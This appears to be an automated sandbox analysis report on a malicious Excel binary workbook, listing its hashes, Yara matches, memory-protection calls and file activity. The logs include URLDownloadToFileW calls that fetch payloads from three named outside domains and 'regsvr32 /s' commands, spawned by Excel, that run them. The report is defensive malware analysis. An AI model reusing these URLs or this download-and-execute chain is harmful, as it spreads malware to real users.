Summary | ZeroBOX

E-1253417553.xlsb

Malicious Library Excel Binary Workbook file format(xlsb)
Category Machine Started Completed
FILE s1_win7_x6401 April 13, 2022, 9:37 a.m. April 13, 2022, 9:39 a.m.
Size 1.2MB
Type Microsoft Excel 2007+
MD5 c06fd22e66beb0fb9b58341480ae5f05
SHA256 a922f7119db11ccd5fd82dada8027bb11884d349074dcb1c0b7a62348e73454e
CRC32 F8026E72
ssdeep 24576:WRDb86nFSv/iMkSy6HYFb50ezNHICBWDxjTBPzC/eA3ctriSo+fTAzZK0jR4kye1:WR384SniMkSyWYFFbzedJTBPzcctS+f0
Yara
  • xlsb - Excel Binary Workbook file format detection
  • Malicious_Library_Zero - Malicious_Library

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fcc1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fd1f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fd1f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76941000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fc61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x65001000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75291000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x750c1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76451000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x734f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fa21000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fa11000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f9d1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x048d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x048d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x09480000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x09490000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file Yhdthd2.ocx
file Yhdthd.ocx
file Yhdthd1.ocx
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x000003a4
filepath: C:\Users\test22\AppData\Local\Temp\~$E-1253417553.xlsb
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$E-1253417553.xlsb
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000040c
filepath: C:\Users\test22\AppData\Local\Temp\~$E-1253417553.xlsb
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$E-1253417553.xlsb
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x00000444
filepath: C:\Users\test22\AppData\Local\Temp\~$E-1253417553.xlsb
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$E-1253417553.xlsb
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0
cmdline regsvr32 /s C:\..\\Yhdthd.ocx
cmdline regsvr32 /s C:\..\\Yhdthd1.ocx
cmdline regsvr32 /s C:\..\\Yhdthd2.ocx
Time & API Arguments Status Return Repeated

URLDownloadToFileW

url: http://ateliecordefeltro.com/T9kpu5Vx0ag/Omnh.png7790983516.dat
stack_pivoted: 0
filepath_r: C:\..\\Yhdthd.ocx
filepath: Yhdthd.ocx
1 0 0

URLDownloadToFileW

url: http://lojaalamar.com.br/nokjRAAdeCA/Omnh.png7790983516.dat
stack_pivoted: 0
filepath_r: C:\..\\Yhdthd1.ocx
filepath: Yhdthd1.ocx
1 0 0

URLDownloadToFileW

url: http://amalalhamed.com/QOqUcVgYi9n/Omnh.png7790983516.dat
stack_pivoted: 0
filepath_r: C:\..\\Yhdthd2.ocx
filepath: Yhdthd2.ocx
1 0 0
parent_process excel.exe martian_process regsvr32 /s C:\..\\Yhdthd.ocx
parent_process excel.exe martian_process regsvr32 /s C:\..\\Yhdthd1.ocx
parent_process excel.exe martian_process regsvr32 /s C:\..\\Yhdthd2.ocx